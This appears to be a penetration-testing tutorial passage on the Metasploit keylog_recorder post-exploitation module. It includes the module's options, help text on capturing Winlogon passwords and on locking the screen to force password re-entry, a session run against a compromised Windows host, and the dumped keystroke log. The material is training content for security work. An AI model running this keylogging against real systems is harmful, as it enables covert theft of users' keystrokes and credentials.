The keylog_recorder post module captures keystrokes on the compromised system. Note that you will want to ensure that you have migrated to an interactive process prior to capturing keystrokes.
Background session 1? [y/N] ymsf > use post/windows/capture/keylog_recordermsf post(keylog_recorder) > info
Name: Windows Capture Keystroke Recorder
Name Current Setting Required Description
---- --------------- -------- -----------
CAPTURE_TYPE explorer no Capture keystrokes for Explorer, Winlogon or PID (Accepted: explorer, winlogon, pid)
INTERVAL 5 no Time interval to save keystrokes in seconds
LOCKSCREEN false no Lock system screen.
MIGRATE false no Perform Migration.
PID no Process ID to migrate to
SESSION yes The session to run this module on.
This module can be used to capture keystrokes. To capture keystrokes
when the session is running as SYSTEM, the MIGRATE option must be
enabled and the CAPTURE_TYPE option should be set to one of
Explorer, Winlogon, or a specific PID. To capture the keystrokes of
the interactive user, the Explorer option should be used with
MIGRATE enabled. Keep in mind that this will demote this session to
the user's privileges, so it makes sense to create a separate
session for this task. The Winlogon option will capture the username
and password entered into the logon and unlock dialog. The
LOCKSCREEN option can be combined with the Winlogon CAPTURE_TYPE to
for the user to enter their clear-text password. It is recommended
to run this module as a job, otherwise it will tie up your framework
msf post(keylog_recorder) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > run post/windows/capture/keylog_recorder
[*] Executing module against V-MAC-XP
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/20110421120355_default_192.168.1.195_host.windows.key_328113.txt
[*] Recording keystrokes...
^C[*] Saving last few keystrokes...
[*] Stopping keystroke sniffer...
After we have finished sniffing keystrokes, or even while the sniffer is still running, we can dump the captured data.
root@kali:~# cat /root/.msf4/loot/20110421120355_default_192.168.1.195_host.windows.key_328113.txt
Keystroke log started at Thu Apr 21 12:03:55 -0600 2011
soft.com anonymous anon@ano
n.com e quit